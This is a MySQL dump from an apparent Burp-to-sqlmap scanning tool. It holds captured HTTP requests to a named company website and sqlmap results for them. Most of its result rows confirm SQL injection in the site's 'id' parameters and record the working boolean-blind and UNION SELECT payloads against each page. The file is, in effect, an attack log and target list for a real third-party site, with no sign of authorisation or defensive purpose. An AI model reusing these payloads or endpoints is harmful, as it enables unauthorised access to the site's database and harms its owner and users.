forked from ssssanr/burp-sqlmapapi
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsqlmap.sql
More file actions
76 lines (68 loc) · 18.4 KB
/
sqlmap.sql
File metadata and controls
76 lines (68 loc) · 18.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
/*
Navicat MySQL Data Transfer
Source Server : localhost_3306
Source Server Version : 50540
Source Host : localhost:3306
Source Database : sqlmap
Target Server Type : MYSQL
Target Server Version : 50540
File Encoding : 65001
Date: 2015-09-08 15:23:59
*/
SET FOREIGN_KEY_CHECKS=0;
-- ----------------------------
-- Table structure for burp
-- ----------------------------
DROP TABLE IF EXISTS `burp`;
CREATE TABLE `burp` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`host` varchar(200) CHARACTER SET utf8 NOT NULL,
`path` varchar(10000) CHARACTER SET utf8 NOT NULL,
`isPost` int(11) NOT NULL,
`postData` text NOT NULL,
`filetype` varchar(100) NOT NULL,
`isComplete` int(11) NOT NULL,
`taskid` varchar(20) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6455 DEFAULT CHARSET=latin1;
-- ----------------------------
-- Records of burp
-- ----------------------------
INSERT INTO `burp` VALUES ('6444', 'http://www.cowinbio.com:80', '/', '0', 'GET / HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441627805\r\n\r\n', '', '2', '4c67af695a4e5f03');
INSERT INTO `burp` VALUES ('6445', 'http://www.cowinbio.com:80', '/news/newinfo.php?id=467', '0', 'GET /news/newinfo.php?id=467 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '40be685009915c99');
INSERT INTO `burp` VALUES ('6446', 'http://www.cowinbio.com:80', '/product/introduction.php?id=65', '0', 'GET /product/introduction.php?id=65 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/news/newinfo.php?id=467\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '37d44debc5c59b40');
INSERT INTO `burp` VALUES ('6447', 'http://www.cowinbio.com:80', '/news/index.php?id=2', '0', 'GET /news/index.php?id=2 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/product/introduction.php?id=65\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', 'bfd548238b5eda1f');
INSERT INTO `burp` VALUES ('6448', 'http://www.cowinbio.com:80', '/news/newinfo.php?id=467&typeid=%202', '0', 'GET /news/newinfo.php?id=467&typeid=%202 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/news/index.php?id=2\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', 'fffb49d22fc1de45');
INSERT INTO `burp` VALUES ('6449', 'http://www.cowinbio.com:80', '/news/index.php?id=2', '0', 'GET /news/index.php?id=2 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/news/newinfo.php?id=467&typeid=%202\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '7e27ae732d9705ce');
INSERT INTO `burp` VALUES ('6450', 'http://www.cowinbio.com:80', '/RDCenter/index.php?id=36', '0', 'GET /RDCenter/index.php?id=36 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/news/index.php?id=2\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '02f3aea6d1ac8a42');
INSERT INTO `burp` VALUES ('6451', 'http://www.cowinbio.com:80', '/manpower/index.php?id=13', '0', 'GET /manpower/index.php?id=13 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/news/index.php?id=2\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', 'e4a84419b0e60aa0');
INSERT INTO `burp` VALUES ('6452', 'http://www.cowinbio.com:80', '/manpower/index.php?id=13', '0', 'GET /manpower/index.php?id=13 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/manpower/index.php?id=13\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', 'b3876a85dfd09141');
INSERT INTO `burp` VALUES ('6453', 'http://www.cowinbio.com:80', '/manpower/index.php?id=14', '0', 'GET /manpower/index.php?id=14 HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/manpower/index.php?id=13\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '920f2e5bae383e8b');
INSERT INTO `burp` VALUES ('6454', 'http://www.cowinbio.com:80', '/product/index.php?title=asad', '0', 'GET /product/index.php?title=asad HTTP/1.1\r\nHost: www.cowinbio.com\r\nProxy-Connection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36\r\nReferer: http://www.cowinbio.com/manpower/index.php?id=14\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: CNZZDATA3242726=cnzz_eid%3D1316305164-1440035400-null%26ntime%3D1441694565\r\n\r\n', 'php', '2', '3409f471b2a5b380');
-- ----------------------------
-- Table structure for result
-- ----------------------------
DROP TABLE IF EXISTS `result`;
CREATE TABLE `result` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`host` varchar(45) DEFAULT NULL,
`url` varchar(255) DEFAULT NULL,
`result` varchar(2048) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=571 DEFAULT CHARSET=latin1;
-- ----------------------------
-- Records of result
-- ----------------------------
INSERT INTO `result` VALUES ('558', 'http://www.youhuaaa.com:80', '/page/article/index.php', 'Not vuln');
INSERT INTO `result` VALUES ('559', 'http://www.youhuaaa.com:80', '/page/tutorial/index.php', 'Not vuln');
INSERT INTO `result` VALUES ('560', 'http://www.cowinbio.com:80', '/', 'Not vuln');
INSERT INTO `result` VALUES ('561', 'http://www.cowinbio.com:80', '/news/newinfo.php?id=467', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.835, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=467 AND 4240=4240\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.835, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [7, 11, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-6175 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627671,0x55745070667674667272,0x71627a7871),NULL,NULL,NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('562', 'http://www.cowinbio.com:80', '/product/introduction.php?id=65', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.784, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=65 AND 9184=9184\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.784, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [0, 2, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-7085 UNION ALL SELECT CONCAT(0x7178786a71,0x506868517a7662486a6e,0x7176766271),NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('563', 'http://www.cowinbio.com:80', '/news/newinfo.php?id=467&typeid=%202', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.835, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=467 AND 2617=2617&typeid= 2\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.835, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [8, 11, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-3427 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707671,0x62684e4e436c6a4e6f4d,0x71627a6b71),NULL,NULL#&typeid= 2\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('564', 'http://www.cowinbio.com:80', '/RDCenter/index.php?id=36', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.728, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=36 AND 8534=8534\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.728, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [0, 11, u\'#\', u\'\', u\'\', u\'NULL\', 1, True, False], u\'where\': 1, u\'payload\': u\'id=36 UNION ALL SELECT CONCAT(0x7176626b71,0x4d71706c6e6d50436e79,0x716a707a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('565', 'http://www.cowinbio.com:80', '/manpower/index.php?id=13', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.88, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=13 AND 5926=5926\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.88, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [0, 2, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-4056 UNION ALL SELECT CONCAT(0x717a6a6271,0x6f5a666e595865514f66,0x7170626271),NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('566', 'http://www.cowinbio.com:80', '/manpower/index.php?id=13', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.88, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=13 AND 5592=5592\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.88, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [0, 2, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-6755 UNION ALL SELECT CONCAT(0x7170716b71,0x5848464c4a6b634f744d,0x717a626b71),NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('567', 'http://www.cowinbio.com:80', '/manpower/index.php?id=14', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.905, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=14 AND 8516=8516\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.905, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [0, 2, u\'#\', u\'\', u\'\', u\'NULL\', 2, False, False], u\'where\': 2, u\'payload\': u\'id=-5819 UNION ALL SELECT CONCAT(0x716a626b71,0x6a5a554261445652735a,0x71766a7171),NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('568', 'http://www.cowinbio.com:80', '/news/index.php?id=2', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.41, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=2 AND 5995=5995\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.41, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [5, 11, u\'#\', u\'\', u\'\', u\'NULL\', 1, False, False], u\'where\': 1, u\'payload\': u\'id=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178786271,0x5655764d6a7370714b6b,0x71627a7871),NULL,NULL,NULL,NULL,NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('569', 'http://www.cowinbio.com:80', '/news/index.php?id=2', '[{u\'status\': 1, u\'type\': 0, u\'value\': [{u\'dbms\': u\'MySQL\', u\'suffix\': u\'\', u\'clause\': [1], u\'ptype\': 1, u\'dbms_version\': None, u\'prefix\': u\'\', u\'place\': u\'GET\', u\'data\': {u\'1\': {u\'comment\': u\'\', u\'matchRatio\': 0.41, u\'title\': u\'AND boolean-based blind - WHERE or HAVING clause\', u\'templatePayload\': None, u\'vector\': u\'AND [INFERENCE]\', u\'where\': 1, u\'payload\': u\'id=2 AND 8326=8326\'}, u\'3\': {u\'comment\': u\'#\', u\'matchRatio\': 0.41, u\'title\': u\'MySQL UNION query (NULL) - 1 to 20 columns\', u\'templatePayload\': None, u\'vector\': [8, 11, u\'#\', u\'\', u\'\', u\'NULL\', 1, False, False], u\'where\': 1, u\'payload\': u\'id=2 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786b7871,0x546771694e416f71676d,0x71786a6b71),NULL,NULL#\'}}, u\'conf\': {u\'string\': None, u\'notString\': None, u\'titles\': False, u\'regexp\': None, u\'textOnly\': False, u\'optimize\': False}, u\'parameter\': u\'id\', u\'os\': None}]}]');
INSERT INTO `result` VALUES ('570', 'http://www.cowinbio.com:80', '/product/index.php?title=asad', 'Not vuln');